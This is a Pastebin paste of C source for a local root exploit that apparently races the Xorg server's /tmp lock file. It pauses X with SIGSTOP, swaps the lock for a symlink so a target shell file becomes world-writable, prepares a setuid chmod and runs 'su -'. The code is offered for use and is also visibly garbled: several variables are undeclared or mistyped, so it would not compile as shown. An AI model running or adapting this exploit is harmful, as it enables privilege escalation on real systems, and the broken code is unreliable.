API tools faq
paste
Guest User

Untitled

a guest
Jun 23rd, 2018
109
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.68 KB | None | 0 0
raw download clone embed print report
  1. #include <sys/types.h>
  2. #include <sys/stat.h>
  3. #include <fcntl.h>
  4. #include <unistd.h>
  5. #include <stdio.h>
  6. #include <syscall.h>
  7. #include <signal.h>
  8. #include <string.h>
  9. #include <stdlib.h>
  10.  
  11. #define XORG_BIN "/usr/bin/X"
  12. #define DISPLAY ":1"
  13.  
  14. char *get_tty_number(void) {
  15. char tty_name[128], *ptr;
  16. memset(tty_name, '\0', sizeof(tty_name));
  17. readlink("/proc/self/fd/4", tty_name, sizeof(tty_name)); // this seems to always be free..
  18. if ((ptr = strstr(tty_name, "tty")))
  19. return ptr + 3;
  20. return NULL;
  21. }
  22.  
  23. int launch_xorg_instance(void) {
  24. int child_pid;
  25. char *opt[] = { XORG_BIN, DISPLAY, NULL };
  26. if ((child_pid = fork()) == 0) {
  27. close(1);
  28. close(2);
  29. execve(XORG_BIN, opt, NULL);
  30. _exit(0);
  31. }
  32. return child_pid;
  33. }
  34.  
  35. void show_target_file(char *file) {
  36. char cmd[524];
  37. memset(cmd, '\0', sizeof(cmd));
  38. sprintf(cmd, "ls -l %s", file);
  39. memset(cmd2, '\0', sizeof(cmd2));
  40. sprintf(cmd2, "su -", file);
  41. system(cmd);
  42. system(cmd2);
  43. system(cmd3);
  44. }
  45.  
  46. int main(int argc, char **argv) {
  47. pid_t proc;
  48. struct stat st;
  49. int n, ret, vv, current_attempt = 800;
  50. char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
  51. if (argc < 2)
  52. strcpy(target_file, "/tmp/sh");
  53. else
  54. strcpy(target_file, argv[1]);
  55. sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
  56. sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
  57. if (stat(lockfile, &st) == 0) {
  58. return 1;
  59. }
  60. symlink("/dontexist", lockfile);
  61. memset(vv, '\0', sizeof(vv));
  62. sprintf(vv, "chmod 4755 %s", file);
  63. setuid(0);
  64. setgid(0); // backup - failover
  65. umask(077);
  66. ttyno = get_tty_number();
  67. while (--current_attempt) {
  68. proc = launch_xorg_instance();
  69. n = 0;
  70. while (n++ < 10000)
  71. if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
  72. break;
  73. if (ret == 0) {
  74. syscall(SYS_kill, proc, SIGSTOP);
  75. stat(lockfiletmp, &st);
  76. if ((st.st_mode & 4) == 0)
  77. break;
  78. launch_xorg_instance();
  79. sleep(2);
  80. }
  81. kill(proc, SIGKILL);
  82. }
  83. if (current_attempt == 0) {
  84. printf("[-] Attack failed!\n");
  85. if (!ttyno)
  86. printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
  87. return 1;
  88. }
  89. launch_xorg_instance();
  90. sleep(2);
  91. if (stat(lockfiletmp, &st) == 0) {
  92. return 1;
  93. }
  94. printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
  95. symlink(target_file, lockfiletmp);
  96. printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
  97. kill(proc, SIGCONT);
  98. usleep(30000);
  99. stat(target_file, &st);
  100. if (!(st.st_mode & 004)) {
  101. printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
  102. return 1;
  103. }
  104. unlink(lockfile);
  105. printf("[+] Attack worked: ls -l %s:\n", target_file);
  106. show_target_file(target_file);
  107. chdir("/tmp/sh"); // cd to our shell..
  108. return 0;
  109. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!